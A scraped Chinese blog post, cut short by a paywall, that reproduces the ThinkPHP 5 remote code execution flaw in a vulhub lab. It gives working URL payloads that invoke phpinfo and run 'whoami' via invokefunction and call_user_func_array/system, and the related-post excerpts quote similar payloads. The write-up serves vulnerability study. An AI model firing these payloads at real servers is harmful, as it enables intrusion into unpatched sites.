Thinkphp 5-rce 漏洞复现（vulhub）

最新推荐文章于 2024-10-18 11:31:49 发布

原创

最新推荐文章于 2024-10-18 11:31:49 发布 · 426 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全

文章讲述了ThinkPHP5中的控制器名处理问题，导致在默认情况下可执行任意方法，引发现远程命令执行漏洞。详细描述了复现漏洞的过程，包括使用phpinfo和file_put_contents等函数进行攻击。

漏洞原因：

ThinkPHP其版本5中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞

复现过程：

1.在虚拟机中拉去thinkphp 5-rce镜像

2.访问本机地址

输出关于php的配置信息

index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

执行命令 whoami

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

MDSEC

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce

qq_51577576的博客

10-02

2926

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

ThinkPHP2-RCE漏洞复现

qq_51459600的博客

06-08

1381

影响版本：PHP 5.2~5.6/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。

1 条评论您还未登录，请先登录后发表或查看评论

vuhub thinkphp-5-rce漏洞复现

qq_46804551的博客

04-24

685

搭建 your-ip:8080 搭建成功漏洞复现 ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中，由于框架错误地处理了控制器名称，因此如果网站未启用强制路由（默认设置），则该框架可以执行任何方法，从而导致RCE漏洞。 poc: 它将执行phpinfo /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现（详细图解）

鱼溯的博客

02-02

2945

vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现（详细图解）

thinkphp5 RCE漏洞复现

feng的博客

03-03

4029

前言之前看的是tp3的SQL注入，现在开始审计一下tp5的一些SQL注入和RCE。先看一下RCE，毕竟thinkphp最广为人知的漏洞就是RCE。首先是源码的下载，我从这里下载： thinkphp下载这里我下载的是thinkphp5.0.22完整版，如果下载核心版的话可能会有一些代码的缺失。 debug模式开启下的RCE 和之前tp5.1的反序列化一样，RCE的执行点也都是重要的request类。关键在于这个filterValue()函数： /** * 递归过滤给定的值 * @param mixe

ThinkPHP V5的RCE（远程代码执行漏洞）

Home to come

04-18

2257

一、Shell脚本基础知识 1.Shell 输入/输出重定向常见重定向符号： 1)标准输出 > 覆盖重定向 set -C 关闭覆盖重定向的功能 set +C：恢复 >| 强制重定向 >> 追加重定向 2)标准输入 < a<b :把b交给a执行 tr 替换文件内容（tr set1 [set2]）char(字符：一个...

ThinkPHP5系列远程代码执行漏洞复现（详细）

weixin_53730939的博客

03-20

1万+

ThinkPHP5系列远程代码执行漏洞复现（详细）

【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现

m0_75036923的博客

09-07

1017

【代码】【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现。

vulhub-thinkphp漏洞复现

qq_51922767的博客

09-14

2999

vulhub-thinkphp漏洞复现

记录一次漏洞复现--thinkphp5远程代码执行漏洞cnvd-2018-24942

banliyaoguai的博客

10-18

352

在地址中添加如下路径与参数。安装vulfocus。

thinkphp系列漏洞复现(组合拳-vulhub里的)

m0_58596609的博客

01-07

1650

thinkphp系列漏洞复现(组合拳)

thinkphp5-rce

shierbai的博客

05-17

633

method=_construct&filter[]=system&method=get&server[REQUEST_METHOD]=id（系统命令）此之前的版本中，获取method的方法没有正确处理方法名，攻击者可以调用request类任意方法并构造利用链，从而导致远程代码执行漏洞。其版本5中，没有正确处理控制器名，导致网站在没有开启强制路由的情况下（默认情况）可以执行任意方法，从而导致远程命令执行漏洞。应用：很多cms是基于thinkphp5二次开发的，所以出问题的话，会影响很多基于其开发的网站。

thinkphp5RCE

weixin_45778886的博客

03-07

2052

这里写目录标题加载第三方类库captcha路由。非debugpayload:1.路由检测1.1跟进self::routeCheck1.2跟进Route::check1.2.1在check函数进入$request->method(),1.2.2进入method()函数1.2.3进入__construct函数1.3跟进self::checkRoute1.4 跟进self::checkRule1.5跟进self::parseRule2.路由检测后，进入self::exec函数2.1 跟进exec函数2.2R

buuctf [ThinkPHP]5-Rce

qq_1873822的博客

03-14

2266

大佬们都是直接rce 这里漏洞技术细节（涉及代码段、原理等）我上个链接 https://blog.youkuaiyun.com/ArrowQin/article/details/105913146 https://bbs.ichunqiu.com/thread-48687-1-1.html?tdsourcetag=s_pcqq_aiomsg 解题版本是ThinkPHP V5.0.20 poc ?s=index/\think\app/invokefunction&function=call_user_fun.

thinkphp5 rce

weixin_51558394的博客

08-17

558

thinkphp5 rce

thinkphp 5 - rce

2301_76467680的博客

06-28

338

1 执⾏phpinfo。2存在漏洞代码执⾏。

thinkphp 5-rce版本漏洞复现(超详细版)